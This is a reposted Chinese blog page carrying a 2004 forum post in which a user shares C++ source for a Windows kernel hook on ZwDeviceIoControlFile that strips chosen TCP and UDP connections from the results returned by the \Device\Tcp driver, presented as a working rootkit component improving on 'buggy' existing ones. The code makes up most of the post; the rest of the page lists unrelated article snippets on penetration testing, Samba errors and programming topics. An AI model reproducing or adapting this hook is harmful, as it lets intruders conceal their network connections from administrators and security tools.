port/connection hiding

最新推荐文章于 2025-11-25 12:12:47 发布
转载 最新推荐文章于 2025-11-25 12:12:47 发布 · 1.5k 阅读 · 0
文章标签:

#tcp #input #hook #list #struct #c++

本文介绍了一种使用C++实现的隐藏网络连接的方法,通过修改内核中的网络请求处理过程来达到隐藏特定TCP或UDP连接的目的。该方法针对已知存在的rootkit隐藏工具的缺陷进行了改进。
port/connection hiding
@ :: worthy ::   Jun 18 2004, 15:57 (UTC+0)
akcom writes: after reading HolyFather's article on rootkits, i wrote a hook to hide connections. I've noticed a few people saying that the already available ones are buggy, so heres my hook (in C++, minor modifications would make it c compatible)


typedef struct _GENERIC_RECORD
{
  ULONG entry1; //state on tcp, local addr on udp
  ULONG entry2; //local addr on tcp, local port on udp
  ULONG entry3; //local port on tcp
  ULONG entry4; //remote addr on tcp
  ULONG entry5; //remote port on tcp
} GENERIC_RECORD, *PGENERIC_RECORD;






NTSTATUS
NTAPI
NewZwDeviceIoControlFile(
  IN HANDLE           FileHandle,
  IN HANDLE           Event OPTIONAL,
  IN PIO_APC_ROUTINE     ApcRoutine OPTIONAL,
  IN PVOID           ApcContext OPTIONAL,
  OUT PIO_STATUS_BLOCK   IoStatusBlock,
  IN ULONG           IoControlCode,
  IN PVOID           InputBuffer OPTIONAL,
  IN ULONG           InputBufferLength,
  OUT PVOID           OutputBuffer OPTIONAL,
  IN ULONG           OutputBufferLength
)
{
  NTSTATUS ntRes = ((ZWDICF)OldZwDeviceIoControlFile)(
                    FileHandle,
                    Event,
                    ApcRoutine,
                    ApcContext,
                    IoStatusBlock,
                    IoControlCode,
                    InputBuffer,
                    InputBufferLength,
                    OutputBuffer,
                    OutputBufferLength
                    );
  if (!NT_SUCCESS(ntRes))
  {
    return ntRes;
  }
 
  if (IoControlCode != 0x120003)
  {
    return ntRes;
  }
 
  POBJECT_NAME_INFORMATION ObjectName;
  char ObjectNameBuf[512];
  ULONG ReturnLen;
  ObjectName = (POBJECT_NAME_INFORMATION)ObjectNameBuf;
  ObjectName->Name.MaximumLength = 500;
  ZwQueryObject( FileHandle, ObjectNameInfo, ObjectName, sizeof(ObjectNameBuf), &ReturnLen );
 
  char ObjectNameMBS[261];  
  wcstombs(ObjectNameMBS, ObjectName->Name.Buffer, sizeof(ObjectNameMBS));
 
  if (stricmp(ObjectNameMBS, "//Device//Tcp") != 0)
  {
    return ntRes;
  }
 
  PBYTE input = (PBYTE)InputBuffer;
  if (InputBufferLength < 17)
  {
    return ntRes;
  }
 
  bool tcp = false;
  /*
  if its tcp, then the first item is
  state, which we need to ignore
  */
  ULONG recordSize = 0;
  if (input[0] == 0x00)
  {
    tcp = true;
    recordSize = sizeof(MIB_TCPROW);
    //tcp
    if (input[16] == 0x02)
    {
        //extended
        recordSize += 4;
    }
  }
  else
  {
    //udp
    recordSize = sizeof(MIB_UDPROW);
    //extended
    if (input[16] == 0x02)
    {
        recordSize += 4;
    }
  }
 
  ULONG entryCount = IoStatusBlock->Information / recordSize;
 
  bool done;
  PGENERIC_RECORD data = (PGENERIC_RECORD)OutputBuffer;
 
  ULONG i;
 
  ULONG ip;
  USHORT port;
 
  i = 0;
 
  while (i < entryCount)
  {
    ip = tcp ? data->entry2 : data->entry1;
    port = (USHORT)(tcp ? data->entry3 : data->entry2);
    // i use a linked list of records to hide,
    // just replace this with your comparison
    if (
        matchesConMask( ip, port, g_ConList )
      )
    {
        //local stuff
        hideEndPoint( (PGENERIC_RECORD)OutputBuffer, entryCount, i, recordSize );
        IoStatusBlock->Information -= recordSize;
        entryCount--;
    }
    else
    // i use a linked list of records to hide,
    // just replace this with your comparison
    if (tcp && matchesConMask( data->entry4, (USHORT)data->entry5, g_ConList ) )
    {
        //remote stuff
        hideEndPoint( (PGENERIC_RECORD)OutputBuffer, entryCount, i, recordSize );
        IoStatusBlock->Information -= recordSize;
        entryCount--;
    }
    else
    {        
        data = (PGENERIC_RECORD)(((char *)data) + recordSize);
        i++;
    }
  }
 
  return ntRes;
}

 

【神兵利器】——187、MSF远程桌面
Fly_鹏程万里
10-16 343
在渗透测试中如果我们获取到了目标服务器的权限,此时我们可以考虑查看当前服务器是否有开启远程桌面,如果有开启远程桌面则可以通过图形化界面的方式进行远程操作,更加便捷,更加迅速,如果没有开启远程桌面,那么我们可以通过获取到的shell来执行命令开启远程桌面,随后进行利用。
linux渗透测试常用命令
全网120W+关注AI拉呱,专注人工智能以及科技前沿!
08-07 579
【代码】linux渗透测试常用命令。
smbclient命令查看Samba服务共享时出现报错“protocol negotiation failed: NT_STATUS_IO_TIMEOUT”
TREEGLORY的博客
12-06 4709
使用smbclient命令查看Samba服务共享了哪些目录时,报错了,报错信息:protocol negotiation failed: NT_STATUS_IO_TIMEOUT 解决方法: 注释掉网卡配置文件中的DNS, 重启网络 [root@master ~]# systemctl restart network 再重新使用smbclient命令查看Samba服务共享,就可以了 [root@master ~]# smbclient -U lsr -L 192.168.100.10 不懂Samba共
解决 NT_STATUS_IO_TIMEOUT 错误:Ubuntu 使用 smbclient 连接共享文件夹时遇到的问题分析
m0_57236802的博客
08-21 2108
在使用 Ubuntu 系统通过smbclient错误。这一错误阻止了我访问目标共享文件夹,使得整个操作中断。经过一番排查和分析,我最终找到了问题的原因并成功解决。在这篇博客中,我将分享我的错误排查过程、可能的原因分析以及最终的解决方法,希望能帮助遇到类似问题的朋友。
samba客户端连接时出现错误,提示protocol negotiation failed: NT_STATUS_IO_TIMEOUT解决方法
weixin_45649763的博客
12-04 9567
近期在redhat7下做samba实验时,配置好服务端及客户端之后,尝试使用 smbclient //172… -U …连接服务器却总是报错。 protocol negotiation failed: NT_STATUS_IO_TIMEOUT 在网上寻求帮助,最终得到解决。现记录如下. 解决方法: 在服务器编辑 /etc/hosts 添加本机解析。 编辑此文件时,设置本机名称为域名的形式,再将...
Chrome的启动参数
Criss@陈磊
02-23 5871
List of Chromium Command Line Switches Condition Explanation --[1]⊗ Classic, non-material, mode for the |kTopChromeMD| switch.↪ --0⊗ Value of the --profiler-timing flag that will disable timin...
RFID 仿真/模拟/监控/拦截/检测/嗅探器
weixin_33895695的博客
09-24 2506
Sound card based RFID sniffer/emulator  (Too tired after recon.cx to do draw the schematics better than that :) Stay tuned for the next version including Tag emulation.) baudline FFT signal anal...
分享OpenSIPS 3.2.x for wss脚本
fs交流的博客
08-11 828
分享opensips3.2.x for wss脚本
kali2020 smb连接的报错问题解决:protocol negotiation failed: NT_STATUS_IO_TIMEOUT
冬萍子癸水
04-19 8419
遇到这个问题。 C:\root\Desktop> smbclient --list 192.168.xxx.xxx do_connect: Connection to 192.168.xxx.xxx failed (Error NT_STATUS_IO_TIMEOUT) 解决原文。要上那个网才能看原贴 打开 /etc/samba/smb.conf global 下加这俩 cli...
关于Centos7 Samba客户端无法连接,提示protocol negotiation failed: NT_STATUS_IO_TIMEOUT错误
Zh_SaTan的博客
09-21 1万+
关于Centos7 Samba客户端无法连接,提示protocol negotiation failed: NT_STATUS_IO_TIMEOUT错误 按照题目要求需要配置Samba服务,配置完成后安装完Samba客户端软件包samba-client,使用smbclient -U smb1 //192.168.12.13/smbshare 显示上述报错。 配置文件: 报错信息: 防火墙fir...
SSH报错:packet_write_wait: Connection to xxx Broken pipe 解决
热门推荐
Android系统攻城狮
06-08 1万+
在client登录添加参数即可 # ssh -o ServerAliveInterval=60 uersname@ip
protocol negotiation failed: NT_STATUS_IO_TIMEOUT
qq_42081940的博客
08-20 9363
    配置好samba共享后,防火墙也配置了,seLinux也设置的,在client在尝试访问共享目录,一下提示protocol negotiation failed: NT_STATUS_IO_TIMEOUT 查看路由也是没有问题,直接ping IP也是可能通,server端查看日志,没有访问失败的日志,重启了下网络服务就好了,不知这个跟DNS有什么关系 [root@system2 ~...
驱动开发(8)处理设备I/O控制函数DeviceIoControl
zuishikonghuan的博客
01-03 8865
本博文由优快云博主zuishikonghuan所作,版权归zuishikonghuan所有,转载请注明出处: 在上面的两篇博文中,介绍了IRP与派遣函数,以及我们通过了一个例子“磁盘设备的绝对读写”来演示了在应用程序中是如何向一个设备发出I/O请求的。这篇博文将演示在驱动程序中处理一个非常简单的I/O请求——由DeviceIoControl这个Win32API经过一系列的调用,在内核中
XML DOM - NodeList 对象
likuolei的博客
11-25 346
本文提供了2025年XML DOM中NodeList对象的实用速查表,重点对比了querySelectorAll和getElementsByTagName两种获取方式的区别。核心内容包括:1)推荐使用querySelectorAll获取静态NodeList;2)提供forEach和for...of两种遍历方式;3)需转数组才能使用map/filter等方法;4)总结3行核心代码和1句记忆口诀。文章还包含常见错误及解决方案,以及NodeList与HTMLCollection的特性对比,帮助开发者快速掌握99%
DOM NodeList
lly202406的博客
11-23 56
DOM NodeList 是一个非常有用的工具,它可以帮助我们轻松地访问和操作文档中的元素。掌握 NodeList 的特点和常用方法,将使你在处理DOM操作时更加得心应手。
Java数据结构初阶——LinkedList
2502_91380778的博客
11-24 477
为什么需要LinkedList?当你的业务需要频繁在列表中间增删元素时,ArrayList效率就低了。本文将介绍LinkedList作为双向链表的优势、常用方法及遍历技巧,并与ArrayList对比,助你做出正确选择。
Java·关于List
最新发布
Porunarufu的博客
11-25 357
List 是Collection接口的子接口,用于存储有序、可重复有序性:元素的插入顺序与存储顺序一致,支持通过索引(0 起始)访问元素;可重复性:允许存储多个相同的元素(包括null索引操作:提供了基于索引的增删改查方法(这是 List 与 Set 最核心的区别)。
reversible Data Hiding in Encrypted Image
12-28
### 可逆数据隐藏技术在加密图像中的应用 #### 技术背景 多媒体密码学方法通常依赖于图像数据的高度压缩特性以及其字节分布的随机性,这使得较轻量级的加密算法能够有效地应用于这些场景中[^1]。然而,在某些情况下,除了保护隐私外还需要保留额外的信息通道用于传输其他重要资料;此时便引入了所谓的“可逆数据隐写”。 #### 实现机制 对于已加密图片实施可逆的数据嵌入操作前,研究者们会预先留出一定空间来容纳附加信息而不影响原有内容的安全性和质量。具体来说,MA等人提出的方案是在加密封装之前就规划好足够的存储区域给后续可能加入的秘密消息预留位置[^2]。 #### 示例说明 假设存在一段简单的二进制位串作为原始未处理过的图形文件片段:“000 000 000 001 000 000 100 000 000 000 000 000”,共计36比特长度[^3]。当对其进行安全转换并希望同时携带隐蔽通信负载时,则需遵循上述原则确保即使经过多次变换仍能精确恢复初始状态下的每一个像素值。 ```python def reserve_room_for_hiding(data_bits, secret_message_length): """ 函数用来模拟为秘密信息预留空间的过程 参数: data_bits (list): 原始图像的二进制表示形式列表 secret_message_length (int): 需要隐藏的消息长度 返回: tuple: 修改后的图像数据和实际可用的空间大小 """ available_space = sum([bit == '0' for bit in ''.join(data_bits)]) if available_space >= secret_message_length: reserved_data = ['1' if i < secret_message_length else b for i, b in enumerate(''.join(data_bits))] return list(reserved_data), secret_message_length else: raise ValueError("Insufficient space to hide the message") data_sequence = ["000", "000", "000", "001", "000", "000", "100", "000", "000", "000", "000", "000"] modified_image, used_space = reserve_room_for_hiding(data_sequence, 5) print(f"Modified Image Data Bits: {' '.join(modified_image)}") print(f"Used Space For Hiding Message: {used_space} bits") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值